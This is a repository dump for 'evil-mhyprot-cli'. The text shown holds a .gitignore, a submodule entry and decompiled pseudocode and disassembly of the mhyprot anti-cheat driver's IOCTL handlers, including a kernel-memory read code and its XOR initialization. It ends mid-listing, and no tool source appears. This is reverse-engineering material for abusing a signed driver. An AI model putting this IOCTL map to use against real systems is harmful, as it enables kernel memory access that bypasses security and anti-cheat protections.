Repository: leeza007/evil-mhyprot-cli
Branch: main
Commit: 1667eeae1f29
Files: 25
Total size: 7.6 MB
Directory structure:
gitextract_ep4t_2av/
├── .gitignore
├── .gitmodules
├── IDA/
│   ├── FUN_0001d000.cpp
│   ├── FUN_0001d6e0.cpp
│   ├── sub_FFFFF800188CD000.txt
│   └── sub_FFFFF800188CD6E0.txt
├── LICENSE
├── README.md
├── evil-mhyprot-cli.sln
├── seedmap.txt
└── src/
    ├── evil-mhyprot-cli.filters
    ├── evil-mhyprot-cli.vcxproj
    ├── file_utils.cpp
    ├── file_utils.hpp
    ├── logger.hpp
    ├── main.cpp
    ├── mhyprot.cpp
    ├── mhyprot.hpp
    ├── nt.hpp
    ├── raw_driver.hpp
    ├── service_utils.cpp
    ├── service_utils.hpp
    ├── sup.hpp
    ├── win_utils.cpp
    └── win_utils.hpp
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Mono auto generated files
mono_crash.*
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
[Ll]ogs/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/
# Ionide (cross platform F# VS Code tools) working folder
.ionide/
libmhyprot-src/*.cpp
libmhyprot-src/*.hpp
libmhyprot-src/*.h
libmhyprot-src/*.vcxproj
libmhyprot-src/*.vcxproj.filters
tests/*.cpp
tests/*.hpp
tests/*.h
tests/*.vcxproj
tests/*.vcxproj.filters
evil-mhyrot-cli.sln
================================================
FILE: .gitmodules
================================================
[submodule "libmhyprot"]
path = libmhyprot
url = https://github.com/kkent030315/libmhyprot.git
================================================
FILE: IDA/FUN_0001d000.cpp
================================================
//
// Pseudocode
//
ulonglong IOCTL_FUN_0001d000(
uint param_1,
ulonglong *param_2,
uint param_3,
ulonglong **param_4,
int *param_5
)
{
int iVar1;
bool bVar2;
int *piVar3;
uint uVar4;
uint uVar5;
ulonglong uVar6;
ulonglong *puVar7;
uint **ppuVar8;
ulonglong uVar9;
int **ppiVar10;
uint unaff_EDI;
undefined8 uVar11;
ulonglong **ppuVar12;
uint *puVar13;
undefined8 extraout_XMM0_Qb;
uint local_res20 [2];
undefined4 *local_2b8;
undefined4 in_stack_fffffffffffffd50;
undefined4 in_stack_fffffffffffffd54;
ulonglong *puVar14;
ulonglong *local_2a8;
undefined4 uStack672;
undefined4 uStack668;
uint *puStack664;
undefined4 uStack656;
undefined4 uStack652;
undefined4 uStack648;
undefined4 uStack644;
undefined4 uStack640;
undefined4 uStack636;
undefined8 uStack632;
undefined4 uStack616;
undefined4 uStack612;
undefined4 uStack608;
undefined4 uStack604;
undefined4 uStack600;
undefined4 uStack596;
undefined4 uStack592;
undefined4 uStack588;
undefined8 uStack584;
int *apiStack568 [66];
piVar3 = param_5;
uVar6 = (ulonglong)param_3;
*param_4 = (ulonglong *)0x0;
puVar13 = local_res20;
local_2a8 = (ulonglong *)0x0;
ppuVar12 = (ulonglong **)&stack0xfffffffffffffd58;
local_res20[0] = 0;
iVar1 = 0;
if (unaff_EDI != 0) {
while ((unaff_EDI >> iVar1 & 1) == 0) {
iVar1 = iVar1 + 1;
}
}
local_2b8 = &DAT_0001a0e8;
*param_5 = 0;
bVar2 = false;
uVar9 = FUN_00012134(param_2,param_3,ppuVar12,puVar13,&DAT_0001a0e8);
if ((((int)uVar9 == 0) || (local_2a8 == (ulonglong *)0x0)) || (local_res20[0] == 0)) {
bVar2 = true;
local_res20[0] = param_3;
local_2a8 = param_2;
}
if (bVar2) {
return uVar9 & 0xffffffffffffff00;
}
puVar14 = local_2a8;
if (param_1 < 0x81104001) {
if (param_1 == 0x81104000) {
param_5 = (int *)FUN_00016834(*(uint *)local_2a8);
LAB_0001d33a:
ppiVar10 = &param_5;
uVar5 = 8;
goto LAB_0001d5f0;
}
puVar7 = (ulonglong *)0x81054000;
if (0x81054000 < param_1) {
if (param_1 == 0x81064000) {
uVar6 = FUN_00013614(*(uint *)local_2a8,uVar6,ppuVar12,puVar13);
uVar5 = (uint)uVar6;
LAB_0001d2e9:
param_5 = (int *)CONCAT44(param_5._4_4_,uVar5);
}
else {
if (param_1 == 0x81074000) {
param_5 = (int *)((ulonglong)param_5._4_4_ << 0x20);
DispatchReadUserMemory_FUN_00014214((int *)local_2a8,(undefined4 *)&param_5);
}
else {
if (param_1 != 0x81084000) {
if (param_1 != 0x81094000) goto LAB_0001d62b;
uVar6 = FUN_000135b0(*(uint *)local_2a8,uVar6,ppuVar12,puVar13);
uVar5 = (uint)uVar6;
goto LAB_0001d2e9;
}
param_5 = (int *)CONCAT44(param_5._4_4_,0x133ecf0);
}
}
LAB_0001d21c:
uVar5 = 4;
ppiVar10 = &param_5;
goto LAB_0001d5f0;
}
if (param_1 == 0x81054000) {
uVar5 = *(uint *)((longlong)local_2a8 + 4);
uVar4 = *(uint *)local_2a8;
puVar7 = (ulonglong *)ExAllocatePool(0,(ulonglong)uVar5 * 0x318 + 4);
uVar6 = FUN_0001274c(uVar4,(longlong)puVar7 + 4,uVar5);
uVar4 = (uint)uVar6;
*(uint *)puVar7 = uVar4;
if (uVar5 < uVar4) {
uVar4 = uVar5;
}
puStack664 = (uint *)CONCAT44(DAT_0001a0ec,DAT_0001a0e8);
uStack656 = DAT_0001a0f0;
uStack652 = DAT_0001a0f4;
uStack648 = DAT_0001a0f8;
uStack644 = DAT_0001a0fc;
uStack640 = DAT_0001a100;
uStack636 = DAT_0001a104;
uStack632 = DAT_0001a108;
FUN_00012270(puVar7,uVar4 * 0x318 + 4,param_4,piVar3,&puStack664);
puVar14 = local_2a8;
LAB_0001d2ac:
puVar7 = (ulonglong *)ExFreePoolWithTag(puVar7,0);
goto LAB_0001d62b;
}
if (param_1 == 0x80024000) {
FUN_000148fc(*(uint *)local_2a8);
param_5 = (int *)((ulonglong)param_5 & 0xffffffff00000000);
goto LAB_0001d21c;
}
if (param_1 == 0x81004000) {
uVar11 = 0x20;
FUN_00017900((undefined4 *)&uStack616,0,0x20);
puVar7 = (ulonglong *)FUN_00014310((longlong *)local_2a8,&uStack616,uVar11,puVar13);
puVar14 = local_2a8;
if ((int)puVar7 != 0) goto LAB_0001d62b;
goto LAB_0001d5e9;
}
if (param_1 == 0x81014000) {
FUN_0001696c(*(uint *)local_2a8);
uVar6 = FUN_00016994();
param_5 = (int *)((ulonglong)param_5 & 0xffffffff00000000 | (ulonglong)((char)uVar6 == '\x01')
);
LAB_0001d17f:
ppuVar8 = (uint **)&uStack616;
uVar5 = 4;
ppiVar10 = &param_5;
uStack616 = DAT_0001a0e8;
uStack612 = DAT_0001a0ec;
uStack608 = DAT_0001a0f0;
uStack604 = DAT_0001a0f4;
uStack584 = DAT_0001a108;
uStack600 = DAT_0001a0f8;
uStack596 = DAT_0001a0fc;
uStack592 = DAT_0001a100;
uStack588 = DAT_0001a104;
}
else {
if (param_1 == 0x81034000) {
thunk_FUN_000136b0(*(uint *)local_2a8);
param_5 = (int *)((ulonglong)param_5 & 0xffffffff00000000);
goto LAB_0001d17f;
}
if (param_1 != 0x81044000) goto LAB_0001d62b;
uVar5 = *(uint *)local_2a8;
FUN_00017900((undefined4 *)apiStack568,0,0x208);
FUN_00013bfc(uVar5,apiStack568,0x104,puVar13);
ppuVar8 = (uint **)&uStack616;
uVar5 = 0x208;
ppiVar10 = apiStack568;
uStack616 = DAT_0001a0e8;
uStack612 = DAT_0001a0ec;
uStack608 = DAT_0001a0f0;
uStack604 = DAT_0001a0f4;
uStack584 = DAT_0001a108;
uStack600 = DAT_0001a0f8;
uStack596 = DAT_0001a0fc;
uStack592 = DAT_0001a100;
uStack588 = DAT_0001a104;
}
}
else {
puVar7 = (ulonglong *)0x82044000;
if (param_1 < 0x82044001) {
if (param_1 == 0x82044000) {
FUN_00017900((undefined4 *)&uStack616,0,0x20);
FUN_00016268();
}
else {
if (param_1 == 0x81114000) {
param_5 = (int *)FUN_00013d44(*(uint *)local_2a8);
goto LAB_0001d33a;
}
if (param_1 == 0x81124000) {
FUN_000996ed(&LAB_0001db10,uVar6,(ulonglong)ppuVar12);
FUN_000b7de0();
uStack672 = (undefined4)extraout_XMM0_Qb;
uStack668 = (undefined4)((ulonglong)extraout_XMM0_Qb >> 0x20);
FUN_000cf4a3();
puStack664 = (uint *)FUN_000add98(DAT_0001a108);
FUN_000cf4a3();
uVar6 = FUN_0004609e();
return uVar6;
}
if (param_1 == 0x82004000) {
param_5 = (int *)((ulonglong)param_5._4_4_ << 0x20);
FUN_00016408(local_2a8[2],local_2a8[1],*local_2a8,puVar13,local_2b8,
(uint *)CONCAT44(in_stack_fffffffffffffd54,in_stack_fffffffffffffd50),
local_2a8);
goto LAB_0001d21c;
}
if (param_1 == 0x82014000) {
FUN_00017900((undefined4 *)&uStack616,0,0x20);
FUN_00015fa0();
}
else {
if (param_1 != 0x82024000) goto LAB_0001d62b;
FUN_00017900((undefined4 *)&uStack616,0,0x20);
FUN_00015f1c();
}
}
}
else {
if (param_1 == 0x82054000) {
FUN_00017900((undefined4 *)&uStack616,0,0x20);
FUN_000161bc(local_2a8,(int)register0x00000020 - 0x268);
}
else {
if (param_1 != 0x82064000) {
if (param_1 == 0x82114000) {
puVar7 = local_2a8;
if ((*(uint *)local_2a8 ^ 0xbaebaeec) != DAT_0001a688) goto LAB_0001d62b;
uVar5 = DAT_0001a6ec ^ DAT_0001a688;
goto LAB_0001d2e9;
}
if (((param_1 != 0x83014000) || (*(uint *)local_2a8 != 0x88)) ||
(puVar7 = (ulonglong *)
ExAllocatePool(0,(ulonglong)*(uint *)((longlong)local_2a8 + 4) * 0x2a8 + 4),
puVar7 == (ulonglong *)0x0)) goto LAB_0001d62b;
uVar6 = FUN_00016038((longlong)puVar7 + 4,(int *)local_2a8);
uVar5 = (uint)uVar6;
*(uint *)puVar7 = uVar5;
if (*(uint *)((longlong)local_2a8 + 4) < uVar5) {
uVar5 = *(uint *)((longlong)local_2a8 + 4);
}
puStack664 = (uint *)CONCAT44(DAT_0001a0ec,DAT_0001a0e8);
uStack656 = DAT_0001a0f0;
uStack652 = DAT_0001a0f4;
uStack648 = DAT_0001a0f8;
uStack644 = DAT_0001a0fc;
uStack640 = DAT_0001a100;
uStack636 = DAT_0001a104;
uStack632 = DAT_0001a108;
FUN_00012270(puVar7,uVar5 * 0x2a8 + 4,param_4,piVar3,&puStack664);
goto LAB_0001d2ac;
}
FUN_00017900((undefined4 *)&uStack616,0,0x20);
FUN_0001630c((longlong)local_2a8,(undefined4 *)&uStack616);
}
}
LAB_0001d5e9:
ppiVar10 = (int **)&uStack616;
uVar5 = 0x20;
LAB_0001d5f0:
ppuVar8 = &puStack664;
puStack664 = (uint *)CONCAT44(DAT_0001a0ec,DAT_0001a0e8);
uStack656 = DAT_0001a0f0;
uStack652 = DAT_0001a0f4;
uStack632 = DAT_0001a108;
uStack648 = DAT_0001a0f8;
uStack644 = DAT_0001a0fc;
uStack640 = DAT_0001a100;
uStack636 = DAT_0001a104;
}
puVar7 = (ulonglong *)FUN_00012270(ppiVar10,uVar5,param_4,piVar3,ppuVar8);
puVar14 = local_2a8;
LAB_0001d62b:
if (puVar14 != (ulonglong *)0x0) {
puVar7 = (ulonglong *)ExFreePoolWithTag(puVar14,0);
}
return CONCAT71((int7)((ulonglong)puVar7 >> 8),1);
}
================================================
FILE: IDA/FUN_0001d6e0.cpp
================================================
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */
//
// Pseudocode
//
undefined8 IOCTL_FUN_0001d6e0(undefined8 param_1,longlong param_2)
{
uint uVar1;
uint uVar2;
uint uVar3;
ulonglong *puVar4;
int iVar5;
undefined8 uVar6;
longlong lVar7;
ulonglong uVar8;
ulonglong *puVar9;
ulonglong uVar10;
uint local_res10 [2];
ulonglong *local_res18;
undefined8 local_198 [48];
lVar7 = *(longlong *)(param_2 + 0xb8);
puVar4 = *(ulonglong **)(param_2 + 0x18);
uVar1 = *(uint *)(lVar7 + 0x18);
uVar2 = *(uint *)(lVar7 + 0x10);
uVar3 = *(uint *)(lVar7 + 8);
uVar10 = (ulonglong)uVar3;
*(undefined8 *)(param_2 + 0x38) = 0;
if (uVar1 == 0x80104000) {
uVar6 = FUN_000121ec((longlong)puVar4,uVar2);
_DAT_0001a110 = (int)uVar6;
*(uint *)puVar4 = -(uint)(_DAT_0001a110 != 0) & 1;
LAB_0001d75c:
uVar10 = 4;
goto LAB_0001da4f;
}
if (((uVar1 + 0x7feec000 & 0xfffcffff) == 0) && (uVar1 != 0x80134000)) goto LAB_0001da4f;
if (uVar1 == 0x80134000) {
lVar7 = FUN_00012314();
*(int *)puVar4 = (int)lVar7;
goto LAB_0001d75c;
}
if (uVar1 == 0x82054000) {
uVar8 = FUN_000126d0(*(uint *)puVar4,(longlong)(uint *)((longlong)puVar4 + 4),
*(uint *)((longlong)puVar4 + 4));
iVar5 = (int)uVar8;
}
else {
if (uVar1 == 0x83024000) {
uVar8 = FUN_000162ec((longlong)puVar4 + 4,(int *)puVar4);
iVar5 = (int)uVar8;
}
else {
if (uVar1 == 0x83074000) {
uVar6 = FUN_00015f18();
iVar5 = (int)uVar6;
}
else {
/* MHYPROT_IOCTL_READ_KERNEL_MEMORY */
if (uVar1 != 0x83064000) {
if (uVar1 == 0x82074000) {
if (((uVar2 < 4) || (uVar3 < 0x38)) || (puVar4 == (ulonglong *)0x0)) goto LAB_0001da4f;
puVar9 = (ulonglong *)ExAllocatePoolWithTag(1,uVar10,0x4746544d);
*puVar9 = SUB168(ZEXT816(0xaaaaaaaaaaaaaaab) * ZEXT816(uVar10 - 8) >> 0x45,0) &
0xffffffff;
uVar8 = FUN_000132b0((uint *)puVar4,puVar9);
*(int *)(param_2 + 0x30) = (int)uVar8;
if ((int)uVar8 < 0) {
uVar10 = 8;
*puVar4 = *puVar9;
}
else {
uVar8 = *puVar9 * 0x30 + 8;
LAB_0001d842:
*(ulonglong *)(param_2 + 0x38) = uVar8;
FUN_000175c0(puVar4,puVar9,uVar8);
}
LAB_0001d85b:
uVar6 = 0x4746544d;
}
else {
if (uVar1 == 0x82104000) {
if (((uVar2 < 0x28) || (uVar3 < 0x20)) || (puVar4 == (ulonglong *)0x0))
goto LAB_0001da4f;
puVar9 = (ulonglong *)ExAllocatePoolWithTag(1,uVar10,0x4746544d);
*(int *)puVar9 =
(int)SUB168(ZEXT816(0xaaaaaaaaaaaaaaab) * ZEXT816(uVar10 - 4) >> 0x44,0);
uVar6 = FUN_0001377c((longlong)puVar4,(uint *)puVar9);
*(int *)(param_2 + 0x30) = (int)uVar6;
if (-1 < (int)uVar6) {
uVar8 = (ulonglong)*(uint *)puVar9 * 0x18 + 4;
goto LAB_0001d842;
}
uVar10 = 4;
*(uint *)puVar4 = *(uint *)puVar9;
goto LAB_0001d85b;
}
if (uVar1 == 0x82094000) {
*(undefined4 *)puVar4 = 0;
goto LAB_0001da4f;
}
/* MHYPROT_IOCTL_INITIALIZE */
if (uVar1 == 0x80034000) {
if (uVar2 == 0x10) {
puVar4[1] = puVar4[1] ^ 0xebbaaef4fff89042;
*puVar4 = *puVar4 ^ puVar4[1];
if (*(int *)((longlong)puVar4 + 4) == -0x45145114) {
FUN_000151a8(*(undefined4 *)puVar4);
if ((int)DAT_0001a108 == 0) {
FUN_0001301c((longlong *)&DAT_0001a0e8,puVar4[1]);
lVar7 = 7;
do {
uVar10 = FUN_00012eb0((uint **)&DAT_0001a0e8);
*puVar4 = uVar10;
DAT_0001a108._0_4_ = 1;
lVar7 = lVar7 + -1;
} while (lVar7 != 0);
uVar10 = 8;
}
else {
uVar10 = 0;
}
}
}
goto LAB_0001da4f;
}
if (uVar1 == 0x81134000) goto LAB_0001da4f;
if (uVar1 == 0x81144000) {
uVar10 = FUN_00016654(*(uint *)puVar4,(longlong)local_198);
iVar5 = (int)uVar10;
if (-1 < iVar5) {
uVar10 = (ulonglong)(uint)(iVar5 * 0x18);
if (0 < iVar5) {
FUN_000175c0(puVar4,local_198,(longlong)iVar5 * 0x18);
}
goto LAB_0001da4f;
}
uVar10 = 4;
goto LAB_0001d7c1;
}
local_res18 = (ulonglong *)0x0;
local_res10[0] = 0;
uVar8 = IOCTL_FUN_0001d000(uVar1,puVar4,uVar2,&local_res18,(int *)local_res10);
puVar9 = local_res18;
if ((char)uVar8 == '\0') goto LAB_0001da4f;
if (uVar3 < local_res10[0]) {
local_res10[0] = uVar3;
}
if ((local_res18 == (ulonglong *)0x0) || (local_res10[0] == 0)) goto LAB_0001da4f;
uVar10 = (ulonglong)local_res10[0];
FUN_000175c0(puVar4,local_res18,(ulonglong)local_res10[0]);
uVar6 = 0;
}
ExFreePoolWithTag(puVar9,uVar6);
goto LAB_0001da4f;
}
uVar6 = FUN_000163a8((undefined4 *)((longlong)puVar4 + 4),*puVar4,*(uint *)(puVar4 + 1));
iVar5 = (int)uVar6;
}
}
}
LAB_0001d7c1:
*(int *)puVar4 = iVar5;
LAB_0001da4f:
*(ulonglong *)(param_2 + 0x38) = uVar10;
*(undefined4 *)(param_2 + 0x30) = 0;
IofCompleteRequest(param_2,0);
return 0;
}
================================================
FILE: IDA/sub_FFFFF800188CD000.txt
================================================
PAGE:FFFFF800188CD000 ; =============== S U B R O U T I N E =======================================
PAGE:FFFFF800188CD000
PAGE:FFFFF800188CD000 ; Attributes: bp-based frame fpd=1D0h
PAGE:FFFFF800188CD000
PAGE:FFFFF800188CD000 sub_FFFFF800188CD000 proc near ; CODE XREF: sub_FFFFF800188CD6E0+327↓p
PAGE:FFFFF800188CD000 ; DATA XREF: .upx0:FFFFF800189F301C↓o
PAGE:FFFFF800188CD000
PAGE:FFFFF800188CD000 var_250 = xmmword ptr -250h
PAGE:FFFFF800188CD000 var_240 = qword ptr -240h
PAGE:FFFFF800188CD000 var_230 = byte ptr -230h
PAGE:FFFFF800188CD000 var_s0 = qword ptr 0
PAGE:FFFFF800188CD000 arg_8 = qword ptr 18h
PAGE:FFFFF800188CD000 arg_10 = xmmword ptr 20h
PAGE:FFFFF800188CD000 arg_20 = qword ptr 30h
PAGE:FFFFF800188CD000 arg_30 = qword ptr 40h
PAGE:FFFFF800188CD000 arg_40 = xmmword ptr 50h
PAGE:FFFFF800188CD000 arg_280 = byte ptr 290h
PAGE:FFFFF800188CD000
PAGE:FFFFF800188CD000 ; FUNCTION CHUNK AT .upx0:FFFFF800189F2672 SIZE 0000005C BYTES
PAGE:FFFFF800188CD000
PAGE:FFFFF800188CD000 mov [rsp+8], rbx
PAGE:FFFFF800188CD005 mov [rsp-8+arg_8], rsi
PAGE:FFFFF800188CD00A push rbp
PAGE:FFFFF800188CD00B push rdi
PAGE:FFFFF800188CD00C push r12
PAGE:FFFFF800188CD00E push r14
PAGE:FFFFF800188CD010 push r15
PAGE:FFFFF800188CD012 lea rbp, [rsp-1B0h]
PAGE:FFFFF800188CD01A sub rsp, 2B0h
PAGE:FFFFF800188CD021 mov ebx, ecx
PAGE:FFFFF800188CD023 mov r14, r9
PAGE:FFFFF800188CD026 lea rcx, qword_FFFFF800188CDB00
PAGE:FFFFF800188CD02D mov esi, r8d
PAGE:FFFFF800188CD030 mov r12, rdx
PAGE:FFFFF800188CD033 jmp loc_FFFFF800189F25E7
PAGE:FFFFF800188CD033 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD038 db 6Bh dup(0CCh)
PAGE:FFFFF800188CD0A3 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD0A3
PAGE:FFFFF800188CD0A3 loc_FFFFF800188CD0A3: ; CODE XREF: sub_FFFFF800189F2541+6D↓j
PAGE:FFFFF800188CD0A3 test dil, dil
PAGE:FFFFF800188CD0A6 jz short loc_FFFFF800188CD0AF
PAGE:FFFFF800188CD0A8 xor al, al
PAGE:FFFFF800188CD0AA jmp loc_FFFFF800188CD642
PAGE:FFFFF800188CD0AF ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD0AF
PAGE:FFFFF800188CD0AF loc_FFFFF800188CD0AF: ; CODE XREF: sub_FFFFF800188CD000+A6↑j
PAGE:FFFFF800188CD0AF mov eax, 81104000h
PAGE:FFFFF800188CD0B4 cmp ebx, eax
PAGE:FFFFF800188CD0B6 ja loc_FFFFF800188CD352
PAGE:FFFFF800188CD0BC jz loc_FFFFF800188CD32E
PAGE:FFFFF800188CD0C2 mov eax, 81054000h
PAGE:FFFFF800188CD0C7 cmp ebx, eax
PAGE:FFFFF800188CD0C9 ja loc_FFFFF800188CD2B9
PAGE:FFFFF800188CD0CF jz loc_FFFFF800188CD22D
PAGE:FFFFF800188CD0D5 cmp ebx, 80024000h
PAGE:FFFFF800188CD0DB jz loc_FFFFF800188CD209
PAGE:FFFFF800188CD0E1 cmp ebx, 81004000h
PAGE:FFFFF800188CD0E7 jz loc_FFFFF800188CD1D9
PAGE:FFFFF800188CD0ED cmp ebx, 81014000h
PAGE:FFFFF800188CD0F3 jz loc_FFFFF800188CD1B9
PAGE:FFFFF800188CD0F9 cmp ebx, 81034000h
PAGE:FFFFF800188CD0FF jz short loc_FFFFF800188CD16C
PAGE:FFFFF800188CD101 cmp ebx, 81044000h
PAGE:FFFFF800188CD107 jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD10D mov rax, [rsp+30h]
PAGE:FFFFF800188CD112 lea rcx, [rbp+1D0h+var_230]
PAGE:FFFFF800188CD116 mov edi, 208h
PAGE:FFFFF800188CD11B xor edx, edx
PAGE:FFFFF800188CD11D mov r8d, edi
PAGE:FFFFF800188CD120 mov ebx, [rax]
PAGE:FFFFF800188CD122 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD127 mov r8d, 104h
PAGE:FFFFF800188CD12D lea rdx, [rbp+1D0h+var_230]
PAGE:FFFFF800188CD131 mov ecx, ebx
PAGE:FFFFF800188CD133 call sub_FFFFF800188C3BFC
PAGE:FFFFF800188CD138 movups xmm0, cs:xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD13F lea rax, [rsp+20h+arg_40]
PAGE:FFFFF800188CD144 mov edx, edi
PAGE:FFFFF800188CD146 movups xmm1, cs:xmmword_FFFFF800188CA0F8
PAGE:FFFFF800188CD14D lea rcx, [rbp+1D0h+var_230]
PAGE:FFFFF800188CD151 movaps [rsp+20h+arg_40], xmm0
PAGE:FFFFF800188CD156 movsd xmm0, cs:qword_FFFFF800188CA108
PAGE:FFFFF800188CD15E movsd [rbp+1D0h+var_240], xmm0
PAGE:FFFFF800188CD163 movaps [rbp+1D0h+var_250], xmm1
PAGE:FFFFF800188CD167 jmp loc_FFFFF800188CD61B
PAGE:FFFFF800188CD16C ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD16C
PAGE:FFFFF800188CD16C loc_FFFFF800188CD16C: ; CODE XREF: sub_FFFFF800188CD000+FF↑j
PAGE:FFFFF800188CD16C mov rax, [rsp+30h]
PAGE:FFFFF800188CD171 mov ecx, [rax]
PAGE:FFFFF800188CD173 call sub_FFFFF800188C36A8
PAGE:FFFFF800188CD178 and dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD17F
PAGE:FFFFF800188CD17F loc_FFFFF800188CD17F: ; CODE XREF: sub_FFFFF800188CD000+1D7↓j
PAGE:FFFFF800188CD17F movups xmm0, cs:xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD186 lea rax, [rsp+20h+arg_40]
PAGE:FFFFF800188CD18B mov edx, 4
PAGE:FFFFF800188CD190 movups xmm1, cs:xmmword_FFFFF800188CA0F8
PAGE:FFFFF800188CD197 lea rcx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD19E movaps [rsp+20h+arg_40], xmm0
PAGE:FFFFF800188CD1A3 movsd xmm0, cs:qword_FFFFF800188CA108
PAGE:FFFFF800188CD1AB movsd [rbp+1D0h+var_240], xmm0
PAGE:FFFFF800188CD1B0 movaps [rbp+1D0h+var_250], xmm1
PAGE:FFFFF800188CD1B4 jmp loc_FFFFF800188CD61B
PAGE:FFFFF800188CD1B9 ; ---------------------------------------------------------------------------
